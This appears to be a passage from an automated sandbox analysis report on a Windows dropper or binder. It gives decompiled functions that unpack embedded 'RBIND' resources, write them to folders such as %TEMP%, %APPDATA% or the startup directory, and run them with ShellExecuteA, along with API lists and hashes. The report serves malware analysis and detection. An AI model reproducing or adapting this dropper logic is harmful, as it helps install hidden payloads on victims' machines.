                                                                                                            				_t108 = _t59 + 1;
                                                                                                            				do {
                                                                                                            					_t97 =  *_t59;
                                                                                                            					_t59 = _t59 + 1;
                                                                                                            				} while (_t97 != 0);
                                                                                                            				E00A31420( &_v280, _t59 - _t108,  &_v308);
                                                                                                            				_t63 = _v308;
                                                                                                            				if(_v288 < 0x10) {
                                                                                                            					_t63 =  &_v308;
                                                                                                            				}
                                                                                                            				OutputDebugStringA(_t63); // executed
                                                                                                            				if(_v288 >= 0x10) {
                                                                                                            					_push(_v308);
                                                                                                            					E00A32BB1();
                                                                                                            					_t139 = _t139 + 4;
                                                                                                            				}
                                                                                                            				_t131 = FindResourceA(0, _v340, _v344);
                                                                                                            				_t66 = CreateFileA( &_v280, 0x40000000, 2, 0, 2, 0x80, 0); // executed
                                                                                                            				_t121 = _t66;
                                                                                                            				_t67 = SizeofResource(0, _t131);
                                                                                                            				WriteFile(_t121, LockResource(LoadResource(0, _t131)), _t67, _v340, 0); // executed
                                                                                                            				FindCloseChangeNotification(_t121); // executed
                                                                                                            				_t132 = _v320;
                                                                                                            				_t72 = _t132;
                                                                                                            				if(_t132 >= 1) {
                                                                                                            					_t72 = 1;
                                                                                                            				}
                                                                                                            				_t110 = _v336;
                                                                                                            				if(_v316 < 0x10) {
                                                                                                            					_t110 =  &_v336;
                                                                                                            				}
                                                                                                            				if(E00A31040(_t72, "2", _t110) != 0 || _t132 < 1 || (0 | _t132 != 0x00000001) != 0) {
                                                                                                            					_t110 =  &_v280;
                                                                                                            					ShellExecuteA(0, "open",  &_v280, 0, 0, 5); // executed
                                                                                                            				}
                                                                                                            				if(_v316 >= 0x10) {
                                                                                                            					_push(_v336);
                                                                                                            					E00A32BB1();
                                                                                                            				}
                                                                                                            				 *[fs:0x0] = _v16;
                                                                                                            				_pop(_t123);
                                                                                                            				_pop(_t133);
                                                                                                            				_pop(_t86);
                                                                                                            				return E00A32701(1, _t86, _v20 ^ _t134, _t110, _t123, _t133);
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • _memset.LIBCMT ref: 00A31115
                                                                                                            • OutputDebugStringA.KERNELBASE(?), ref: 00A311F6
                                                                                                            • FindResourceA.KERNEL32(00000000,?,?), ref: 00A31222
                                                                                                            • CreateFileA.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00A31241
                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00A31253
                                                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000), ref: 00A3125C
                                                                                                            • LockResource.KERNEL32(00000000), ref: 00A31263
                                                                                                            • WriteFile.KERNELBASE(00000000,00000000), ref: 00A3126B
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00A31272
                                                                                                            • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00A312D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FileFind$ChangeCloseCreateDebugExecuteLoadLockNotificationOutputShellSizeofStringWrite_memset
                                                                                                            • String ID: open
                                                                                                            • API String ID: 1625157610-2758837156
                                                                                                            • Opcode ID: eb6387db3f50aa28b11f11d6bb36d4699130fa29febeb7bc822e2a47f5d7e822
                                                                                                            • Instruction ID: 07e7debc00a721cb128bd775668185acef4da90e6844f43cfc224992d4c9e531
                                                                                                            • Opcode Fuzzy Hash: eb6387db3f50aa28b11f11d6bb36d4699130fa29febeb7bc822e2a47f5d7e822
                                                                                                            • Instruction Fuzzy Hash: EF61B171D002289FCB25DBA4CD89BEBB7B9FB49700F0445A9F909A7200D7705E85CF90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00A31320(intOrPtr __edx) {
                                                                                                            				struct HINSTANCE__* _t1;
                                                                                                            				_Unknown_base(*)()* _t2;
                                                                                                            				struct HINSTANCE__* _t5;
                                                                                                            				intOrPtr _t8;
                                                                                                            
                                                                                                            				_t8 = __edx;
                                                                                                            				_t1 = LoadLibraryA("shell32.dll");
                                                                                                            				 *0xa3e940 = _t1;
                                                                                                            				if(_t1 == 0) {
                                                                                                            					_t1 = E00A32E90(_t1);
                                                                                                            				}
                                                                                                            				_t2 = GetProcAddress(_t1, "ShellExecuteA");
                                                                                                            				 *0xa3e944 = _t2;
                                                                                                            				if(__imp__ShellExecuteA == 0) {
                                                                                                            					E00A32E90(0); // executed
                                                                                                            				}
                                                                                                            				E00A31EB0(_t8, __imp__ShellExecuteA); // executed
                                                                                                            				EnumResourceNamesA(0, "RBIND", E00A310C0, 0);
                                                                                                            				_t5 =  *0xa3e940; // 0x760b0000
                                                                                                            				return FreeLibrary(_t5);
                                                                                                            			}
APIs
• LoadLibraryA.KERNEL32(shell32.dll,00A331F5,00A30000,00000000,00000000,0000000A), ref: 00A31325
• GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 00A31340
• EnumResourceNamesA.KERNEL32 ref: 00A3136E
• FreeLibrary.KERNEL32(760B0000,?,ShellExecuteA), ref: 00A3137A
  • Part of subcall function 00A32E90: _doexit.LIBCMT ref: 00A32E9C
Strings
Memory Dump Source
• Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
• Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: Library$AddressEnumFreeLoadNamesProcResource_doexit
• String ID: RBIND$ShellExecuteA$shell32.dll
• API String ID: 2421111958-1274833461
• Opcode ID: ffe5fed9245658f379ee5ddaca216f1ded181d6a85d52eb0190d47b6473f9a51
• Instruction ID: f10f8ec221b335e8743b6d03eef3eb31a49e8fb93e193363edeb2e905d204901
• Opcode Fuzzy Hash: ffe5fed9245658f379ee5ddaca216f1ded181d6a85d52eb0190d47b6473f9a51
• Instruction Fuzzy Hash: 49F0ED74A84301BBD7A4EBF0AD4FB1B7AA57B12706F144801FA05E51E1D7F494428B65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 69%
			E00A31EB0(intOrPtr __edx, void* __eflags) {
				char _v12;
				char _v16;
				signed int _v24;
				intOrPtr _v28;
				signed int _v36;
				char _v48;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v88;
				signed int _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t77;
				signed int _t79;
				intOrPtr* _t87;
				char _t91;
				signed int _t92;
				char _t94;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				void* _t104;
				void* _t106;
				void* _t109;
				void* _t113;
				void* _t115;
				void* _t117;
				void* _t133;
				signed int _t135;
				void* _t136;
				signed int _t167;
				intOrPtr _t170;
				void* _t171;
				void* _t172;
				signed int _t174;
				intOrPtr _t177;
				void* _t184;
				void* _t190;
				char* _t191;
				intOrPtr* _t192;
				signed int _t193;
				intOrPtr* _t194;
				char _t195;
				void* _t198;
				signed int _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t216;
				signed int _t223;

				_t166 = __edx;
				_push(0xffffffff);
				_t207 = (_t205 & 0xfffffff8) - 0x48;
				_t77 =  *0xa3d07c; // 0xa189a5e1
				_v24 = _t77 ^ _t207;
				_t79 =  *0xa3d07c; // 0xa189a5e1
				 *[fs:0x0] =  &_v16;
				E00A31870( &_v56);
				_t208 = _t207 - 0x1c;
				_v12 = 0;
				_t191 = _t208;
				 *((intOrPtr*)(_t191 + 0x10)) = 0;
				 *((intOrPtr*)(_t191 + 0x14)) = 0xf;
				 *_t191 = 0;
				_v92 = _t208;
				E00A31420("DROPIN", 6, _t191);
				_t87 = E00A31AD0( &_v88, _t166,  &_v60, _t79 ^ _t207, _t172, _t190, _t133,  *[fs:0x0], E00A386C0); // executed
				_t192 = _t87;
				if(_t192 == 0xa3dbf8) {
					_t174 = 0;
					__eflags = 0;
				} else {
					if( *0xa3dc0c >= 0x10) {
						_t171 =  *0xa3dbf8; // 0x4d455400
						_push(_t171);
						E00A32BB1();
						_t208 = _t208 + 4;
					}
					_t174 = 0;
					 *0xa3dc0c = 0xf;
					 *0xa3dc08 = 0;
					 *0xa3dbf8 = 0;
					if( *((intOrPtr*)(_t192 + 0x14)) >= 0x10) {
						 *0xa3dbf8 =  *_t192;
						 *_t192 = 0;
					} else {
						E00A32850(0xa3dbf8, _t192,  *((intOrPtr*)(_t192 + 0x10)) + 1);
						_t208 = _t208 + 0xc;
					}
					 *0xa3dc08 =  *((intOrPtr*)(_t192 + 0x10));
					_t166 =  *((intOrPtr*)(_t192 + 0x14));
					 *0xa3dc0c =  *((intOrPtr*)(_t192 + 0x14));
					 *((intOrPtr*)(_t192 + 0x10)) = _t174;
					 *((intOrPtr*)(_t192 + 0x14)) = _t174;
				}
				_v12 = 0;
				if(_v68 >= 0x10) {
					_push(_v88);
					E00A32BB1();
					_t208 = _t208 + 4;
				}
				_t209 = _t208 - 0x1c;
				_t193 = _t209;
				 *((intOrPtr*)(_t193 + 0x10)) = _t174;
				 *((intOrPtr*)(_t193 + 0x14)) = 0xf;
				_v92 = _t209;
				 *_t193 = 0;
				E00A31420("EXEC", 4, _t193);
				_push( &_v60);
				_t194 = E00A31AD0( &_v88, _t166);
				if(_t194 != 0xa3dc14) {
					_t216 =  *0xa3dc28 - 0x10; // 0xf
					if(_t216 >= 0) {
						_t170 =  *0xa3dc14; // 0x0
						_push(_t170);
						E00A32BB1();
						_t209 = _t209 + 4;
					}
					 *0xa3dc28 = 0xf;
					 *0xa3dc24 = 0;
					 *0xa3dc14 = 0;
					if( *((intOrPtr*)(_t194 + 0x14)) >= 0x10) {
						 *0xa3dc14 =  *_t194;
						 *_t194 = 0;
					} else {
						E00A32850(0xa3dc14, _t194,  *((intOrPtr*)(_t194 + 0x10)) + 1);
						_t209 = _t209 + 0xc;
					}
					 *0xa3dc24 =  *((intOrPtr*)(_t194 + 0x10));
					 *0xa3dc28 =  *((intOrPtr*)(_t194 + 0x14));
					 *((intOrPtr*)(_t194 + 0x10)) = 0;
					 *((intOrPtr*)(_t194 + 0x14)) = 0;
				}
				_v16 = 0;
				if(_v72 >= 0x10) {
					_push(_v92);
					E00A32BB1();
					_t209 = _t209 + 4;
				}
				_t195 =  *0xa3dc08; // 0x0
				_t91 = _t195;
				if(_t195 >= 6) {
					_t91 = 6;
				}
				_t177 =  *0xa3dc0c; // 0xf
				_t135 =  *0xa3dbf8; // 0x4d455400
				_t167 = _t135;
				if(_t177 < 0x10) {
					_t167 = 0xa3dbf8;
				}
				_t92 = E00A31040(_t91, "%TEMP%", _t167);
				if(_t92 == 0) {
					if(_t195 >= 6) {
						__eflags = _t195 - 6;
						_t35 = _t195 != 6;
						__eflags = _t35;
						_t92 = 0 | _t35;
					} else {
						_t92 = _t92 | 0xffffffff;
					}
					_t223 = _t92;
				}
				if((_t92 & 0xffffff00 | _t223 == 0x00000000) == 0) {
					_t94 = _t195;
					__eflags = _t195 - 9;
					if(_t195 >= 9) {
						_t94 = 9;
					}
					_t168 = _t135;
					__eflags = _t177 - 0x10;
					if(_t177 < 0x10) {
						_t168 = 0xa3dbf8;
					}
					_t95 = E00A31040(_t94, "%APPDATA%", _t168);
					__eflags = _t95;
					if(__eflags == 0) {
						__eflags = _t195 - 9;
						if(_t195 >= 9) {
							__eflags = _t195 - 9;
							_t43 = _t195 != 9;
							__eflags = _t43;
							_t95 = 0 | _t43;
						} else {
							_t95 = _t95 | 0xffffffff;
						}
						__eflags = _t95;
					}
					if(__eflags == 0) {
						_t97 = E00A325D0("%PROGFILES%", 0xa3dbf8);
						__eflags = _t97;
						if(_t97 == 0) {
							_t98 = E00A325D0("%DEFDRIVE%", 0xa3dbf8);
							__eflags = _t98;
							if(_t98 == 0) {
								_t99 = E00A325D0("%STARTUPDIR%", 0xa3dbf8);
								__eflags = _t99;
								if(_t99 == 0) {
									_t100 = E00A325D0("%LAPPDATA%", 0xa3dbf8);
									__eflags = _t100;
									if(_t100 == 0) {
										_t101 = E00A325D0("%USERDIR%", 0xa3dbf8);
										__eflags = _t101;
										if(_t101 == 0) {
											_t209 = _t209 - 0x1c;
                                                                                                            											_v96 = _t209;
                                                                                                            											E00A31390("FULLPATH", _t209);
                                                                                                            											_t168 =  &_v64;
                                                                                                            											_push( &_v64);
                                                                                                            											_t104 = E00A31AD0( &_v92,  &_v64);
                                                                                                            											_v48 = 0xb;
                                                                                                            										} else {
                                                                                                            											_t104 = E00A31C50( &_v92, 5);
                                                                                                            											_t209 = _t209 + 4;
                                                                                                            											_v16 = 0xa;
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										_t104 = E00A31C50( &_v92, 0x1c);
                                                                                                            										_t209 = _t209 + 4;
                                                                                                            										_v16 = 9;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									_t104 = E00A31C50( &_v92, 0x18);
                                                                                                            									_t209 = _t209 + 4;
                                                                                                            									_v16 = 8;
                                                                                                            								}
                                                                                                            								L59:
                                                                                                            								E00A323D0(_t104, 0xa3dc30);
                                                                                                            								_t106 = E00A32340( &_v96);
                                                                                                            								goto L60;
                                                                                                            							}
                                                                                                            							_t159 =  &_v92;
                                                                                                            							_t109 = E00A31DA0(_t135,  &_v92);
                                                                                                            							_v16 = 6;
                                                                                                            							E00A323D0(_t109, 0xa3dc30);
                                                                                                            							_v16 = 0;
                                                                                                            							__eflags = _v72 - 0x10;
                                                                                                            							if(_v72 >= 0x10) {
                                                                                                            								_t159 = _v92;
                                                                                                            								_push(_v92);
                                                                                                            								E00A32BB1();
                                                                                                            								_t209 = _t209 + 4;
                                                                                                            							}
                                                                                                            							__eflags =  *0xa3dc40;
                                                                                                            							if( *0xa3dc40 <= 0) {
                                                                                                            								_t106 = E00A31420("C:\\", 3, 0xa3dc30);
                                                                                                            								goto L60;
                                                                                                            							} else {
                                                                                                            								_t104 = E00A32440(_t159,  &_v92, 0xa3dc30, 3);
                                                                                                            								_v24 = 7;
                                                                                                            								goto L59;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t113 = E00A31C50( &_v92, 0x26);
                                                                                                            						_t209 = _t209 + 4;
                                                                                                            						_v16 = 5;
                                                                                                            						_t106 = E00A323D0(_t113, 0xa3dc30);
                                                                                                            						__eflags = _v72 - 0x10;
                                                                                                            						if(_v72 >= 0x10) {
                                                                                                            							_push(_v92);
                                                                                                            							_t106 = E00A32BB1();
                                                                                                            							_t209 = _t209 + 4;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						_t115 = E00A31C50( &_v92, 0x1a);
                                                                                                            						_t209 = _t209 + 4;
                                                                                                            						_v16 = 4;
                                                                                                            						_t106 = E00A323D0(_t115, 0xa3dc30);
                                                                                                            						__eflags = _v72 - 0x10;
                                                                                                            						if(_v72 >= 0x10) {
                                                                                                            							_t168 = _v92;
                                                                                                            							_push(_v92);
                                                                                                            							_t106 = E00A32BB1();
                                                                                                            							_t209 = _t209 + 4;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					goto L60;
                                                                                                            				} else {
                                                                                                            					_t117 = E00A31E20(_t135,  &_v92);
                                                                                                            					_v16 = 3;
                                                                                                            					_t106 = E00A323D0(_t117, 0xa3dc30);
                                                                                                            					if(_v72 >= 0x10) {
                                                                                                            						_push(_v92);
                                                                                                            						_t106 = E00A32BB1();
                                                                                                            						_t209 = _t209 + 4;
                                                                                                            					}
                                                                                                            					L60:
                                                                                                            					if(_v48 >= 0x10) {
                                                                                                            						_push(_v68);
                                                                                                            						_t106 = E00A32BB1();
                                                                                                            						_t209 = _t209 + 4;
                                                                                                            					}
                                                                                                            					 *[fs:0x0] = _v28;
                                                                                                            					_pop(_t184);
                                                                                                            					_pop(_t198);
                                                                                                            					_pop(_t136);
                                                                                                            					return E00A32701(_t106, _t136, _v36 ^ _t209, _t168, _t184, _t198);
                                                                                                            				}
                                                                                                            			}
                                                                                                            0x00a322bf
                                                                                                            0x00a32289
                                                                                                            0x00a3228f
                                                                                                            0x00a32294
                                                                                                            0x00a32297
                                                                                                            0x00a32297
                                                                                                            0x00a32261
                                                                                                            0x00a32267
                                                                                                            0x00a3226c
                                                                                                            0x00a3226f
                                                                                                            0x00a3226f
                                                                                                            0x00a322ec
                                                                                                            0x00a322f3
                                                                                                            0x00a322fc
                                                                                                            0x00000000
                                                                                                            0x00a322fc
                                                                                                            0x00a321dd
                                                                                                            0x00a321e1
                                                                                                            0x00a321ed
                                                                                                            0x00a321f2
                                                                                                            0x00a321f7
                                                                                                            0x00a321fc
                                                                                                            0x00a32201
                                                                                                            0x00a32203
                                                                                                            0x00a32207
                                                                                                            0x00a32208
                                                                                                            0x00a3220d
                                                                                                            0x00a3220d
                                                                                                            0x00a32210
                                                                                                            0x00a32217
                                                                                                            0x00a32244
                                                                                                            0x00000000
                                                                                                            0x00a32219
                                                                                                            0x00a32226
                                                                                                            0x00a3222b
                                                                                                            0x00000000
                                                                                                            0x00a3222b
                                                                                                            0x00a32217
                                                                                                            0x00a32194
                                                                                                            0x00a32199
                                                                                                            0x00a321a3
                                                                                                            0x00a321a8
                                                                                                            0x00a321ad
                                                                                                            0x00a321b2
                                                                                                            0x00a321bc
                                                                                                            0x00a321bd
                                                                                                            0x00a321c2
                                                                                                            0x00a321c2
                                                                                                            0x00a3213f
                                                                                                            0x00a32145
                                                                                                            0x00a3214a
                                                                                                            0x00a32154
                                                                                                            0x00a32159
                                                                                                            0x00a3215e
                                                                                                            0x00a32163
                                                                                                            0x00a32169
                                                                                                            0x00a3216d
                                                                                                            0x00a3216e
                                                                                                            0x00a32173
                                                                                                            0x00a32173
                                                                                                            0x00a32163
                                                                                                            0x00000000
                                                                                                            0x00a320c7
                                                                                                            0x00a320cb
                                                                                                            0x00a320d7
                                                                                                            0x00a320dc
                                                                                                            0x00a320e6
                                                                                                            0x00a320f0
                                                                                                            0x00a320f1
                                                                                                            0x00a320f6
                                                                                                            0x00a320f6
                                                                                                            0x00a32301
                                                                                                            0x00a32306
                                                                                                            0x00a3230c
                                                                                                            0x00a3230d
                                                                                                            0x00a32312
                                                                                                            0x00a32312
                                                                                                            0x00a32319
                                                                                                            0x00a32321
                                                                                                            0x00a32322
                                                                                                            0x00a32323
                                                                                                            0x00a32332
                                                                                                            0x00a32332

APIs
• Part of subcall function 00A31AD0: FindResourceA.KERNEL32(00000000,?,?), ref: 00A31B20
• _memmove.LIBCMT ref: 00A31F70
• Part of subcall function 00A31C50: SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000,A189A5E1), ref: 00A31C9E
• Part of subcall function 00A323D0: _memmove.LIBCMT ref: 00A32403
• _memmove.LIBCMT ref: 00A32031
Strings
Memory Dump Source
• Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
• Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: _memmove$FindFolderPathResourceSpecial
• String ID: %APPDATA%$%DEFDRIVE%$%LAPPDATA%$%PROGFILES%$%STARTUPDIR%$%TEMP%$%USERDIR%$C:\$DROPIN$EXEC$FULLPATH
• API String ID: 1519558674-3215377631
• Opcode ID: 69752cdfe17de193bb08837bf0ecbde7f42adf61924210fbe9cbb652b7ad78aa
• Instruction ID: 93f91d06fc00da3b8e6ce08451fd871bb80e946c1d9ffdf3b1e5537a0beb5631
• Opcode Fuzzy Hash: 69752cdfe17de193bb08837bf0ecbde7f42adf61924210fbe9cbb652b7ad78aa
• Instruction Fuzzy Hash: 13C1FFB1918340CBD714EF79AA4275BF7E5AB85300F040A2DF9968B391EB74D849C7A3
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 72%
E00A31AD0(void** __ecx, CHAR* __edx, intOrPtr _a4, CHAR* _a8, intOrPtr _a28) {
	struct HINSTANCE__* _v8;
	char _v16;
	signed int _v20;
	char _v279;
	char _v280;
	void* _v284;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t33;
	signed int _t34;
	intOrPtr _t36;
	struct HRSRC__* _t38;
	void* _t39;
	long _t40;
	intOrPtr* _t46;
	struct HRSRC__* _t59;
	void* _t61;
	CHAR* _t63;
	intOrPtr _t65;
	void* _t75;
	void* _t77;
	void** _t80;
	void* _t81;
	signed int _t82;
	void* _t83;
	void* _t84;

	_t71 = __edx;
	_push(0xffffffff);
	_push(E00A38598);
	_push( *[fs:0x0]);
	_t84 = _t83 - 0x10c;
	_t33 =  *0xa3d07c; // 0xa189a5e1 (stack cookie seed)
	_t34 = _t33 ^ _t82;
	_v20 = _t34;
	_push(_t34);
	 *[fs:0x0] =  &_v16;
	_t36 = _a4;
	_t80 = __ecx; // output string object (MSVC std::string layout: size at [4], capacity at [5])
	_v284 = 0;
	_v8 = 0;
	_t63 = _a8;
	if(_a28 < 0x10) {
		_t63 =  &_a8; // short string stored inline: use the in-place buffer as the resource name
	}
	_t38 = FindResourceA(0, _t63,  *(_t36 + 0x1c)); // executed; resource name from _a8, type from _a4+0x1c
	_t59 = _t38;
	if(_t59 != 0) {
		_t39 = LoadResource(0, _t59);
		_t75 = _t39;
		if(_t75 != 0) {
			_t40 = SizeofResource(0, _t59);
			_v284 = LockResource(_t75); // raw resource bytes
			_v280 = 0;
			E00A357C0( &_v279, 0, 0x103); // memset-like: zero the 0x104-byte stack buffer
			E00A32850( &_v280, _v284, _t40); // copy SizeofResource bytes into the stack buffer; no bound against 0x104
			_t84 = _t84 + 0x18;
			FreeResource(_t75);
			_t46 =  &_v280;
			_t80[5] = 0xf; // empty SSO string: capacity 15
			_t80[4] = 0;   // size 0
			 *_t80 = 0;
			_t26 = _t46 + 1; // 0x1
			_t71 = _t26;
			do { // strlen of the copied buffer
				_t65 =  *_t46;
				_t46 = _t46 + 1;
			} while (_t65 != 0);
			E00A31420( &_v280, _t46 - _t71, _t80); // assign buffer contents to the output string
			if(_a28 >= 0x10) {
				_push(_a8);
				goto L12; // heap-allocated name: free it
			}
		} else {
			_t80[4] = _t39;
			_t80[5] = 0xf;
			 *_t80 = _t39;
			E00A31420(0xa3b0aa, _t75, _t80); // LoadResource failed: assign the empty string
			if(_a28 >= 0x10) {
				_t71 = _a8;
				_push(_a8);
				goto L12;
			}
		}
	} else {
		_t80[4] = 0;
		_t80[5] = 0xf;
		 *_t80 = 0;
		E00A31420(0xa3b0aa, 0, _t80); // resource not found: assign the empty string
		if(_a28 >= 0x10) {
			_push(_a8);
			L12:
			E00A32BB1();
		}
	}
	 *[fs:0x0] = _v16;
	_pop(_t77);
	_pop(_t81);
	_pop(_t61);
	return E00A32701(_t80, _t61, _v20 ^ _t82, _t71, _t77, _t81); // stack-cookie check and return
}
Instruction address column for the C-code listing above (one entry per statement, in listing order): 0x00a31ad0, 0x00a31ad3, 0x00a31ad5, 0x00a31ae0, 0x00a31ae1, 0x00a31ae7, 0x00a31aec, 0x00a31aee, 0x00a31af4, 0x00a31af8, 0x00a31afe, 0x00a31b03, 0x00a31b05, 0x00a31b0b, 0x00a31b12, 0x00a31b15, 0x00a31b17, 0x00a31b17, 0x00a31b20, 0x00a31b26, 0x00a31b2a, 0x00a31b5a, 0x00a31b60, 0x00a31b64, 0x00a31b92, 0x00a31ba6, 0x00a31bb5, 0x00a31bbc, 0x00a31bd0, 0x00a31bd5, 0x00a31bd9, 0x00a31bdf, 0x00a31be5, 0x00a31bec, 0x00a31bf3, 0x00a31bf6, 0x00a31bf6, 0x00a31c00, 0x00a31c00
                                                                                                            0x00a31c02
                                                                                                            0x00a31c03
                                                                                                            0x00a31c11
                                                                                                            0x00a31c1a
                                                                                                            0x00a31c1f
                                                                                                            0x00000000
                                                                                                            0x00a31c1f
                                                                                                            0x00a31b66
                                                                                                            0x00a31b66
                                                                                                            0x00a31b69
                                                                                                            0x00a31b70
                                                                                                            0x00a31b77
                                                                                                            0x00a31b80
                                                                                                            0x00a31b86
                                                                                                            0x00a31b89
                                                                                                            0x00000000
                                                                                                            0x00a31b89
                                                                                                            0x00a31b80
                                                                                                            0x00a31b2c
                                                                                                            0x00a31b2c
                                                                                                            0x00a31b2f
                                                                                                            0x00a31b3d
                                                                                                            0x00a31b40
                                                                                                            0x00a31b49
                                                                                                            0x00a31b52
                                                                                                            0x00a31c20
                                                                                                            0x00a31c20
                                                                                                            0x00a31c25
                                                                                                            0x00a31b49
                                                                                                            0x00a31c2d
                                                                                                            0x00a31c35
                                                                                                            0x00a31c36
                                                                                                            0x00a31c37
                                                                                                            0x00a31c45

APIs
• FindResourceA.KERNEL32(00000000,?,?), ref: 00A31B20
• LoadResource.KERNEL32(00000000,00000000), ref: 00A31B5A
• SizeofResource.KERNEL32(00000000,00000000), ref: 00A31B92
• LockResource.KERNEL32(00000000), ref: 00A31B9B
• _memset.LIBCMT ref: 00A31BBC
• _memmove.LIBCMT ref: 00A31BD0
• FreeResource.KERNEL32(00000000), ref: 00A31BD9
Memory Dump Source
• Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
• Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
Similarity
• API ID: Resource$FindFreeLoadLockSizeof_memmove_memset
• String ID:
• API String ID: 4079094743-0
• Opcode ID: e60acfb88607a81f65f76a9d0b65066b97bec367ebbf6ca38e50cc408457ca90
• Instruction ID: 3152feae474860143aa609b02e95814e153cdd690ef1657421f88cc530c7c4b8
• Opcode Fuzzy Hash: e60acfb88607a81f65f76a9d0b65066b97bec367ebbf6ca38e50cc408457ca90
• Instruction Fuzzy Hash: F541E171900208DFDB24DF68DC45BEAB7F8FB49700F004A5AF95697241DBB49A45CBA1
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A31330(struct HINSTANCE__* __eax, intOrPtr __edx) {
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t1; // declaration missing from the decompiler output; _t1 is the module handle passed to GetProcAddress
				struct HINSTANCE__* _t5;
				intOrPtr _t8;

				_t8 = __edx;
				_t1 = __eax;
				if(__eax == 0) {
					_t1 = E00A32E90(__eax); // subcall 00A32E90 reaches _doexit (see APIs list)
				}
				// ShellExecuteA is resolved at run time rather than through the import table
				_t2 = GetProcAddress(_t1, "ShellExecuteA");
				 *0xa3e944 = _t2;
				if(__imp__ShellExecuteA == 0) {
					E00A32E90(0); // executed
				}
				E00A31EB0(_t8, __imp__ShellExecuteA); // executed
				// enumerate every resource of the custom type "RBIND"; E00A310C0 is the per-resource callback
				EnumResourceNamesA(0, "RBIND", E00A310C0, 0);
				_t5 =  *0xa3e940; // 0x760b0000
				return FreeLibrary(_t5);
			}


APIs
• GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 00A31340
• EnumResourceNamesA.KERNEL32 ref: 00A3136E
• FreeLibrary.KERNEL32(760B0000,?,ShellExecuteA), ref: 00A3137A
  • Part of subcall function 00A32E90: _doexit.LIBCMT ref: 00A32E9C
Memory Dump Source
• Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
• Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp
• Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp
• Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp
Similarity
• API ID: AddressEnumFreeLibraryNamesProcResource_doexit
• String ID: RBIND$ShellExecuteA
• API String ID: 2589694317-233069040
• Opcode ID: d85750ed479726b7a39cae42efeb20851a1164c83c5ef5fb5cd45d5821ec31b5
• Instruction ID: 004dac64b05d8df6a627ab7b828a9dc093f96ff43a37998454b37813e2a09ced
• Opcode Fuzzy Hash: d85750ed479726b7a39cae42efeb20851a1164c83c5ef5fb5cd45d5821ec31b5
• Instruction Fuzzy Hash: 92E04F30A84300B7D664E7F09D4FF1B36A57711706F100800F605E50E1C7F854418B65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00A32C38(int _a4) {

				E00A32C0D(_a4); // ___crtCorExitProcess: lets a loaded CLR (mscoree.dll / CorExitProcess) shut down first
				ExitProcess(_a4);
			}


APIs
• ___crtCorExitProcess.LIBCMT ref: 00A32C40
